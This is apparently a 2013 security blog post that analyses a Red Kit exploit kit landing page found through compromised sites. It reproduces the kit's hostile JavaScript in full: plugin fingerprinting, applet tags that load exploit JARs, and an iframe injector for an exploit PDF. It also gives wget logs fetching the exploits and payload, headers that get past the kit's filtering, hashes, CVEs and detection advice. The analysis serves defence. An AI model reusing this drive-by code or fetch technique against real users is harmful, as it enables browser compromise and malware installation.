having covered the Blackhole Exploit Kit lately I thought it would be a great Idea to look more into the Red Kit EK.
A good start for malicious URL's, as always is urlquery.net or malwaredomainlist.com
Todays pick was urlquery: Some poor Madonna fans having a bad day!
I just looked into the output and immediately found 2 iframes that caught my attention:
hxxp: //miamiheattickets.com/http.php hxxp: //tucsonaccidentattorney.net/mhed.html?j=449177
0. Fetch the web pages
The second page looks especially interesting as it has the distinct pattern of a RK URL
--2013-03-10 19:48:19-- hxxp: //miamiheattickets.com/http.php
Resolving miamiheattickets.com... 174.120.81.158
Connecting to miamiheattickets.com|174.120.81.158|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 404 Not Found
Date: Sun, 10 Mar 2013 18:49:15 GMT
Server: Apache
Last-Modified: Tue, 10 Apr 2012 05:19:44 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
2013-03-10 19:48:21 ERROR 404: Not Found.
--2013-03-10 19:49:28-- hxxp: //tucsonaccidentattorney.net/mhed.html?j=449177
Resolving tucsonaccidentattorney.net... 67.18.140.14
Connecting to tucsonaccidentattorney.net|67.18.140.14|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 301 Moved Permanently
Date: Sun, 10 Mar 2013 18:50:24 GMT
Server: Apache
Location: hxxp: //fgccnc.org/mhed.htm?j=449177
Content-Length: 0
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
Location: hxxp: //fgccnc.org/mhed.htm?j=449177 [following]
--2013-03-10 19:49:30-- hxxp: //fgccnc.org/mhed.htm?j=449177
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 18:50:26 GMT
Server: Apache
Content-Length: 12956
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html
Length: 12956 (13K) [text/html]
Saving to: `pane2.html'
0K .......... .. 100% 205M=0s
2013-03-10 19:49:33 (205 MB/s) - `pane2.html' saved [12956/12956]
Excellent :) got a hit on the second page.
1. Plugin Detect ver 0.7.7
<html>
<script>
var dtYWu = {
version: "0.7.7",
rDate: "04/11/2012",
name: "diction",
handler: function (c, b, a) {
return function () {
c(b, a)
}
},
isDefined: function (b) {
return typeof b != "undefined"
},
isArray: function (b) {
return (/array/i).test(Object.prototype.toString.call(b))
},
isFunc: function (b) {
return typeof b == "function"
},
isString: function (b) {
return typeof b == "string"
},
isNum: function (b) {
return typeof b == "number"
},
isStrNum: function (b) {
return (typeof b == "string" && (/\d/).test(b))
},
getNumRegx: /[\d][\d\.\_,-]*/,
splitNumRegx: /[\.\_,-]/g,
getNum: function (b, c) {
var d = this,
a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
return a ? a[0] : null
},
compareNums: function (h, f, d) {
var e = this,
c, b, a, g = parseInt;
if (e.isStrNum(h) && e.isStrNum(f)) {
if (e.isDefined(d) && d.compareNums) {
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for (a = 0; a < Math.min(c.length, b.length); a++) {
if (g(c[a], 10) > g(b[a], 10)) {
return 1
}
if (g(c[a], 10) < g(b[a], 10)) {
return -1
}
}
}
return 0
},
formatNum: function (b, c) {
var d = this,
a, e;
if (!d.isStrNum(b)) {
return null
}
if (!d.isNum(c)) {
c = 4
}
c--;
e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for (a = 0; a < 4; a++) {
if (/^(0+)(.+)$/.test(e[a])) {
e[a] = RegExp.$2
}
if (a > c || !(/\d/).test(e[a])) {
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
},
$$hasMimeType: function (a) {
return function (c) {
if (!a.isIE && c) {
var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
for (b = 0; b < d.length; b++) {
if (a.isString(d[b]) && /[^\s]/.test(d[b])) {
f = navigator.mimeTypes[d[b]];
e = f ? f.enabledPlugin : 0;
if (e && (e.name || e.description)) {
return f
}
}
}
}
return null
}
},
findNavPlugin: function (l, e, c) {
var j = this,
h = new RegExp(l, "i"),
d = (!j.isDefined(e) || e) ? /\d/ : 0,
k = c ? new RegExp(c, "i") : 0,
a = navigator.plugins,
g = "",
f, b, m;
for (f = 0; f < a.length; f++) {
m = a[f].description || g;
b = a[f].name || g;
if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
if (!k || !(k.test(m) || k.test(b))) {
return a[f]
}
}
}
return null
},
getMimeEnabledPlugin: function (k, m, c) {
var e = this,
f, b = new RegExp(m, "i"),
h = "",
g = c ? new RegExp(c, "i") : 0,
a, l, d, j = e.isString(k) ? [k] : k;
for (d = 0; d < j.length; d++) {
if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
l = f.description || h;
a = f.name || h;
if (b.test(l) || b.test(a)) {
if (!g || !(g.test(l) || g.test(a))) {
return f
}
}
}
}
return 0
},
getPluginFileVersion: function (f, b) {
var h = this,
e, d, g, a, c = -1;
if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
return b
}
if (!b) {
return e
}
e = h.formatNum(e);
b = h.formatNum(b);
d = b.split(h.splitNumRegx);
g = e.split(h.splitNumRegx);
for (a = 0; a < d.length; a++) {
if (c > -1 && a > c && d[a] != "0") {
return b
}
if (g[a] != d[a]) {
if (c == -1) {
c = a
}
if (d[a] != "0") {
return b
}
}
}
return e
},
AXO: window.ActiveXObject,
getAXO: function (a) {
var f = null,
d, b = this,
c = {};
try {
f = new b.AXO(a)
} catch (d) {}
return f
},
convertFuncs: function (f) {
var a, g, d, b = /^[$][$]/,
c = this;
for (a in f) {
if (b.test(a)) {
try {
g = a.slice(2);
if (g.length > 0 && !f[g]) {
f[g] = f[a](f);
delete f[a]
}
} catch (d) {}
}
}
},
initObj: function (e, b, d) {
var a, c;
if (e) {
if (e[b[0]] == 1 || d) {
for (a = 0; a < b.length; a = a + 2) {
e[b[a]] = b[a + 1]
}
}
for (a in e) {
c = e[a];
if (c && c[b[0]] == 1) {
this.initObj(c, b)
}
}
}
},
initScript: function () {
var c = this,
a = navigator,
e = "/",
f, i = a.userAgent || "",
g = a.vendor || "",
b = a.platform || "",
h = a.product || "";
c.initObj(c, ["$", c]);
for (f in c.Plugins) {
if (c.Plugins[f]) {
c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
}
};
c.OS = 100;
if (b) {
var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "", 100];
for (f = d.length - 2; f >= 0; f = f - 2) {
if (d[f] && new RegExp(d[f], "i").test(b)) {
c.OS = d[f + 1];
break
}
}
}
c.convertFuncs(c);
c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
c.ActiveXEnabled = false;
if (c.isIE) {
var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
for (f = 0; f < j.length; f++) {
if (c.getAXO(j[f])) {
c.ActiveXEnabled = true;
break
}
}
}
c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null;
c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
c.addWinEvent("load", c.handler(c.runWLfuncs, c))
},
init: function (d) {
var c = this,
b, d, a = {
status: -3,
plugin: 0
};
if (!c.isString(d)) {
return a
}
if (d.length == 1) {
c.getVersionDelimiter = d;
return a
}
d = d.toLowerCase().replace(/\s/g, "");
b = c.Plugins[d];
if (!b || !b.getVersion) {
return a
}
a.plugin = b;
if (!c.isDefined(b.installed)) {
b.installed = null;
b.version = null;
b.version0 = null;
b.getVersionDone = null;
b.pluginName = d
}
c.garbage = false;
if (c.isIE && !c.ActiveXEnabled && d !== "java") {
a.status = -2;
return a
}
a.status = 1;
return a
},
fPush: function (b, a) {
var c = this;
if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
a.push(b)
}
},
callArray: function (b) {
var c = this,
a;
if (c.isArray(b)) {
for (a = 0; a < b.length; a++) {
if (b[a] === null) {
return
}
c.call(b[a]);
b[a] = null
}
}
},
call: function (c) {
var b = this,
a = b.isArray(c) ? c.length : -1;
if (a > 0 && b.isFunc(c[0])) {
c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
} else {
if (b.isFunc(c)) {
c(b)
}
}
},
getVersionDelimiter: ",",
$$getVersion: function (a) {
return function (g, d, c) {
var e = a.init(g),
f, b, h = {};
if (e.status < 0) {
return null
};
f = e.plugin;
if (f.getVersionDone != 1) {
f.getVersion(null, d, c);
if (f.getVersionDone === null) {
f.getVersionDone = 1
}
}
a.cleanup();
b = (f.version || f.version0);
b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
return b
}
},
cleanup: function () {},
addWinEvent: function (d, c) {
var e = this,
a = window,
b;
if (e.isFunc(c)) {
if (a.addEventListener) {
a.addEventListener(d, c, false)
} else {
if (a.attachEvent) {
a.attachEvent("on" + d, c)
} else {
b = a["on" + d];
a["on" + d] = e.winHandler(c, b)
}
}
}
},
winHandler: function (d, c) {
return function () {
d();
if (typeof c == "function") {
c()
}
}
},
WLfuncs0: [],
WLfuncs: [],
runWLfuncs: function (a) {
var b = {};
a.winLoaded = true;
a.callArray(a.WLfuncs0);
a.callArray(a.WLfuncs);
if (a.onDoneEmptyDiv) {
a.onDoneEmptyDiv()
}
},
winLoaded: false,
$$onWindowLoaded: function (a) {
return function (b) {
if (a.winLoaded) {
a.call(b)
} else {
a.fPush(b, a.WLfuncs)
}
}
},
div: null,
divID: "plugindetect",
divWidth: 50,
pluginSize: 1,
emptyDiv: function () {
var d = this,
b, h, c, a, f, g;
if (d.div && d.div.childNodes) {
for (b = d.div.childNodes.length - 1; b >= 0; b--) {
c = d.div.childNodes[b];
if (c && c.childNodes) {
for (h = c.childNodes.length - 1; h >= 0; h--) {
g = c.childNodes[h];
try {
c.removeChild(g)
} catch (f) {}
}
}
if (c) {
try {
d.div.removeChild(c)
} catch (f) {}
}
}
}
if (!d.div) {
a = document.getElementById(d.divID);
if (a) {
d.div = a
}
}
if (d.div && d.div.parentNode) {
try {
d.div.parentNode.removeChild(d.div)
} catch (f) {}
d.div = null
}
},
DONEfuncs: [],
onDoneEmptyDiv: function () {
var c = this,
a, b;
if (!c.winLoaded) {
return
}
if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
return
}
for (a in c) {
b = c[a];
if (b && b.funcs) {
if (b.OTF == 3) {
return
}
if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
return
}
}
}
for (a = 0; a < c.DONEfuncs.length; a++) {
c.callArray(c.DONEfuncs)
}
c.emptyDiv()
},
getWidth: function (c) {
if (c) {
var a = c.scrollWidth || c.offsetWidth,
b = this;
if (b.isNum(a)) {
return a
}
}
return -1
},
getTagStatus: function (m, g, a, b) {
var c = this,
f, k = m.span,
l = c.getWidth(k),
h = a.span,
j = c.getWidth(h),
d = g.span,
i = c.getWidth(d);
if (!k || !h || !d || !c.getDOMobj(m)) {
return -2
}
if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
return 0
}
if (l >= i) {
return -1
}
try {
if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
if (!m.winLoaded && c.winLoaded) {
return 1
}
if (m.winLoaded && c.isNum(b)) {
if (!c.isNum(m.count)) {
m.count = b
}
if (b - m.count >= 10) {
return 1
}
}
}
} catch (f) {}
return 0
},
getDOMobj: function (g, a) {
var f, d = this,
c = g ? g.span : 0,
b = c && c.firstChild ? 1 : 0;
try {
if (b && a) {
d.div.focus()
}
} catch (f) {}
return b ? c.firstChild : null
},
setStyle: function (b, g) {
var f = b.style,
a, d, c = this;
if (f && g) {
for (a = 0; a < g.length; a = a + 2) {
try {
f[g[a]] = g[a + 1]
} catch (d) {}
}
}
},
insertDivInBody: function (a, i) {
var h, f = this,
b = "pd33993399",
d = null,
j = i ? window.top.document : window.document,
c = "<",
g = (j.getElementsByTagName("body")[0] || j.body);
if (!g) {
try {
j.write(c + 'div id="' + b + '">o' + c + "/div>");
d = j.getElementById(b)
} catch (h) {}
}
g = (j.getElementsByTagName("body")[0] || j.body);
if (g) {
if (g.firstChild && f.isDefined(g.insertBefore)) {
g.insertBefore(a, g.firstChild)
} else {
g.appendChild(a)
}
if (d) {
g.removeChild(d)
}
} else {}
},
insertHTML: function (g, b, h, a, l) {
var m, n = document,
k = this,
q, p = n.createElement("span"),
o, j, f = "<";
var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
if (!k.isDefined(a)) {
a = ""
}
if (k.isString(g) && (/[^\s]/).test(g)) {
g = g.toLowerCase().replace(/\s/g, "");
q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
q += 'style="' + i + 'display:inline;" ';
for (o = 0; o < b.length; o = o + 2) {
if (/[^\s]/.test(b[o + 1])) {
q += b[o] + '="' + b[o + 1] + '" '
}
}
q += ">";
for (o = 0; o < h.length; o = o + 2) {
if (/[^\s]/.test(h[o + 1])) {
q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
}
}
q += a + f + "/" + g + ">"
} else {
q = a
}
if (!k.div) {
j = n.getElementById(k.divID);
if (j) {
k.div = j
} else {
k.div = n.createElement("div");
k.div.id = k.divID
}
k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
if (!j) {
k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
k.insertDivInBody(k.div)
}
}
if (k.div && k.div.parentNode) {
k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
try {
p.innerHTML = q
} catch (m) {};
try {
k.div.appendChild(p)
} catch (m) {};
return {
span: p,
winLoaded: k.winLoaded,
tagName: g,
outerHTML: q
}
}
return {
span: null,
winLoaded: k.winLoaded,
tagName: "",
outerHTML: q
}
},
Plugins: {
adobereader: {
mimeType: "application/pdf",
navPluginObj: null,
progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
INSTALLED: {},
pluginHasMimeType: function (d, c, f) {
var b = this,
e = b.$,
a;
for (a in d) {
if (d[a] && d[a].type && d[a].type == c) {
return 1
}
}
if (e.getMimeEnabledPlugin(c, f)) {
return 1
}
return 0
},
getVersion: function (l, j) {
var g = this,
d = g.$,
i, f, m, n, b = null,
h = null,
k = g.mimeType,
a, c;
if (d.isString(j)) {
j = j.replace(/\s/g, "");
if (j) {
k = j
}
} else {
j = null
}
if (d.isDefined(g.INSTALLED[k])) {
g.installed = g.INSTALLED[k];
return
}
if (!d.isIE) {
a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
if (g.getVersionDone !== 0) {
g.getVersionDone = 0;
b = d.getMimeEnabledPlugin(g.mimeType, a);
if (!j) {
n = b
}
if (!b && d.hasMimeType(g.mimeType)) {
b = d.findNavPlugin(a, 0)
}
if (b) {
g.navPluginObj = b;
h = d.getNum(b.description) || d.getNum(b.name);
h = d.getPluginFileVersion(b, h);
if (!h && d.OS == 1) {
if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
h = "9"
} else {
if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
h = "8"
}
}
}
}
} else {
h = g.version
}
if (!d.isDefined(n)) {
n = d.getMimeEnabledPlugin(k, a)
}
g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
} else {
b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
c = /=\s*([\d\.]+)/g;
try {
f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
for (m = 0; m < 5; m++) {
if (c.test(f) && (!h || RegExp.$1 > h)) {
h = RegExp.$1
}
}
} catch (i) {}
g.installed = h ? 1 : (b ? 0 : -1)
}
if (!g.version) {
g.version = d.formatNum(h)
}
g.INSTALLED[k] = g.installed
}
},
zz: 0
}
};
</script>
<body>
<script>
document.write('<applet archive="hxxp: //fgccnc.org/332.jar" code="Vlast.class"><param name="elitken" value="l16r3o5uvme2r3o5uvtcwr3o5uvhair3o5uv.ecr3o5uv3hyr3o5uv3vcr3o5uv/gar3o5uvgo2r3o5uvrabr3o5uvoqkr3o5uv.dar3o5uvch3r3o5uvncrr3o5uvchkr3o5uvch9r3o5uvg3tr3o5uvf14r3o5uv/q9r3o5uv/brr3o5uv:rer3o5uvpovr3o5uvtzrr3o5uvtalr3o5uvhlzr3o5uv"></applet>');
document.write('<applet archive="hxxp: //fgccnc.org/887.jar" code="Vlast.class"><param name="elitken" value="l80r3o5uvm16r3o5uvtm6r3o5uvhrcr3o5uv.mcr3o5uv1gwr3o5uv4zlr3o5uv/kwr3o5uvgvar3o5uvr1wr3o5uvo2or3o5uv.56r3o5uvcidr3o5uvn3yr3o5uvccvr3o5uvcsar3o5uvgm4r3o5uvfpgr3o5uv/tor3o5uv/61r3o5uv:o4r3o5uvpkcr3o5uvt1gr3o5uvt59r3o5uvhhmr3o5uv"></applet>');
</script>
<script type="text/javascript">
var biiz = "s" + "r" + "c";
var makral = false;
function tksmke() {
otrtorol.setAttribute("width", 25);
otrtorol.setAttribute("height", 22);
document.body.appendChild(otrtorol);
otrtorol.setAttribute(biiz, "hxxp: //fgccnc.org/987.pdf");
}
function etract(a, b) {
if ((a == 8 && b < 4) || (a == 9 && b < 4)) makral = true;
}
var otrtorol = document.createElement("ifra" + "me");
dtYWu.initScript();
function ygutiy(lite, arwtawt) {
if (arwtawt) {
arwtawt = arwtawt.split(',');
etract(arwtawt[0], arwtawt[1]);
}
}
ygutiy(1, dtYWu.getVersion("AdobeReader"));
while (makral) {
tksmke();
makral = false;
}
</script>
</body>
</html>
The most interesting are the links to the exploit filesdocument.write('<applet archive="hxxp: //fgccnc.org/332.j&#97;r" code="Vlast.class"><param name="elitken" value="l16r3o5uvme2r3o5uvtcwr3o5uvhair3o5uv.ecr3o5uv3hyr3o5uv3vcr3o5uv/gar3o5uvgo2r3o5uvrabr3o5uvoqkr3o5uv.dar3o5uvch3r3o5uvncrr3o5uvchkr3o5uvch9r3o5uvg3tr3o5uvf14r3o5uv/q9r3o5uv/brr3o5uv:rer3o5uvpovr3o5uvtzrr3o5uvtalr3o5uvhlzr3o5uv"></applet>');
document.write('<applet archive="hxxp: //fgccnc.org/887.j&#97;r" code="Vlast.class"><param name="elitken" value="l80r3o5uvm16r3o5uvtm6r3o5uvhrcr3o5uv.mcr3o5uv1gwr3o5uv4zlr3o5uv/kwr3o5uvgvar3o5uvr1wr3o5uvo2or3o5uv.56r3o5uvcidr3o5uvn3yr3o5uvccvr3o5uvcsar3o5uvgm4r3o5uvfpgr3o5uv/tor3o5uv/61r3o5uv:o4r3o5uvpkcr3o5uvt1gr3o5uvt59r3o5uvhhmr3o5uv"></applet>');
</script>
<script type="text/javascript">
var biiz = "s" + "r" + "c";
var makral = false;
function tksmke() {
otrtorol.setAttribute("width", 25);
otrtorol.setAttribute("height", 22);
document.body.appendChild(otrtorol);
otrtorol.setAttribute(biiz, "hxxp: //fgccnc.org/987.pdf");
}
2 JAR's and ome PDF: 332.jar, 887.jar and 987.pdf
2. Fetch the exploit files, -NOT
--2013-03-10 19:57:03-- hxxp: //fgccnc.org/332.jar Resolving fgccnc.org... 50.22.90.99 Connecting to fgccnc.org|50.22.90.99|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 404 Not Found Date: Sun, 10 Mar 2013 18:57:57 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html 2013-03-10 19:57:05 ERROR 404: Not Found. --2013-03-10 19:58:32-- hxxp: //fgccnc.org/332.jar Resolving fgccnc.org... 50.22.90.99 Connecting to fgccnc.org|50.22.90.99|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 404 Not Found Date: Sun, 10 Mar 2013 18:59:26 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html 2013-03-10 19:58:34 ERROR 404: Not Found. --2013-03-10 19:58:53-- hxxp: //fgccnc.org/332.jar Resolving fgccnc.org... 50.22.90.99 Connecting to fgccnc.org|50.22.90.99|:80... connected. HTTP request sent, awaiting response... HTTP/1.1 404 Not Found Date: Sun, 10 Mar 2013 18:59:47 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=75 Connection: Keep-Alive Content-Type: text/html 2013-03-10 19:58:56 ERROR 404: Not Found.
Nope! 404's all over my screen. Not so easy to pick these low hanging fruit after all...
Fortunately my GOOGLE fu is with me and I found a great hint over @ day by day blog
3. Header FU
Add these headers to the request:
content-type: application/x-java-archive Accept: text/html, image/gif, *; q=.2, */*; q=.2
That would have taken me ages to figure out, but now I'm happy
4. Fetch the exploit files - for real
--2013-03-10 20:02:13-- hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 19:03:08 GMT
Server: Apache
Content-Disposition: inline; filename=e55de572.jar
Content-Length: 13798
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/java-archive
Length: 13798 (13K) [application/java-archive]
Saving to: `332.jar'
0K .......... ... 100% 2.65M=0.005s
2013-03-10 20:02:15 (2.65 MB/s) - `332.jar' saved [13798/13798]
--2013-03-10 20:03:30-- hxxp: //fgccnc.org/887.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 19:04:25 GMT
Server: Apache
Content-Disposition: inline; filename=31d64b95.jar
Content-Length: 13731
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/java-archive
Length: 13731 (13K) [application/java-archive]
Saving to: `887.jar'
0K .......... ... 100% 4.37M=0.003s
2013-03-10 20:03:32 (4.37 MB/s) - `887.jar' saved [13731/13731]
--2013-03-10 20:04:26-- hxxp: //fgccnc.org/987.pdf
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 19:05:20 GMT
Server: Apache
Content-Disposition: inline; filename=bb43a521.pdf
Content-Length: 5531
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/pdf
Length: 5531 (5.4K) [application/pdf]
Saving to: `987.pdf'
0K ..... 100% 113M=0s
2013-03-10 20:04:28 (113 MB/s) - `987.pdf' saved [5531/5531]
Excellent. The files are downloaded. Time for a quick analysis:
5. Quick analysis
Lets figure out what the bad guys wanted to send to us and what payload they really wanted to hand over to the poor Maddonna fans.
332.jar MD5: 913f1d801abd70a483888ea20aad3a73 Virustotal: 5/45 https://www.virustotal.com/en/file/08759205ed8a2030e659e2ee843c56d13fadd18cdb1a5e1a077bd4e8422dd035/analysis/1362953517/ CVE-2012-1723 887.jar MD5: 60de68f7919603650a50633f82da7c9b Virustotal: 6/45 https://www.virustotal.com/en/file/912991ab959148febe90297815dd3025507bad10ffebe7555dfddf7708dd6566/analysis/1362953559/ 987.pdf MD5: 67c5a657b54cf4dc9cae74bfb763a285 Virustotal: 2/45 https://www.virustotal.com/en/file/7be4238988221318f2ca6c41419fd452d892d0af62efa9834d55411900ecfbc3/analysis/1362953625/ WepaWet: Malicious http://wepawet.iseclab.org/view.php?hash=67c5a657b54cf4dc9cae74bfb763a285&type=js CVE-2010-0188
As wepawet is kind enough to give us the URL to the EXE:
6. Fetching the final payload
--2013-03-10 20:08:26-- hxxp: //fgccnc.org/62.html
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 10 Mar 2013 19:09:21 GMT
Server: Apache
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe
Content-Length: 32128
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: application/octet-stream
Length: 32128 (31K) [application/octet-stream]
Saving to: `62.exe'
0K .......... .......... .......... . 100% 51.3K=0.6s
2013-03-10 20:08:29 (51.3 KB/s) - `62.exe' saved [32128/32128]
62.exe AKA setup.exe
MD5:5b7c57fb83f0e47821b97fb93f055716
Virustotal: 0/45
Hmmmf; 0/45 @ VT and no MZ first in the file. Need too look more into this...
7. IDS signatures
As a sidestep writing IDS signatures for calls to 332.jar, 887.jar, 987.pdf, 62.html and receiving setup.exe and the URL pattern [a-z][a-z][a-z][a-z]\.html\?.=[0-9][0-9][0-9][0-9][0-9][0-9] should give you better sleep at night if you work with detection and intrusion prevention / detection.
Still some fun left here, but no time today. Hopefully tomorrow...
Update 2013-03-13
Well I just wanted to revisit my .exe file to figure out what was wrong. Since I had not analyzed this properly I thought that there was some XOR scheme or encryption/obfuscation I had owerlooked.
So I started up my remnux box and got:
First densityscout with a low value indicating that this is pretty random bytes. So it is eather some kind of encryption or a rotating XOR. xorsearch told me no single byte xor match eather :(
Then I went back to my log for the fetch and noticed that I had used "Java" as user agent and I remembered that I then will get encrypted .exe files from Red Kit.
Then everything went smoother and here is the quick analysis:
setup.exe
MD5: 06c907401d42dc218f3ca9b83b4d07ce
Virustotal: 28/45
Great post by n3mes1s covering analysis og the PDF as well.
PS: seems like we only need the "Accept: " header for the PDF fetch,
Happy Red KIT EK malware files stealing!
Post publish reading:
Kahu Security - "Digging deeper into redkit"
Malwageddon - "RedKit: Lights! Camera! Action --- Part 2"
malforsec - "Redkit payload decryption"
After you remembered you had used "Java" as user agent and that you would get encrypted .exe files from Red Kit - what did you have to do to decrypt the .exe?
ReplyDeleteSince I used Java in the user agent I got an encrypted file. It's encrypted with AES and the KEY and IV is in the JAR file.
ReplyDeleteSince the info is published elsewhere I decided to publish as well: http://malforsec.blogspot.com/2013/05/redkit-payload-decryption.html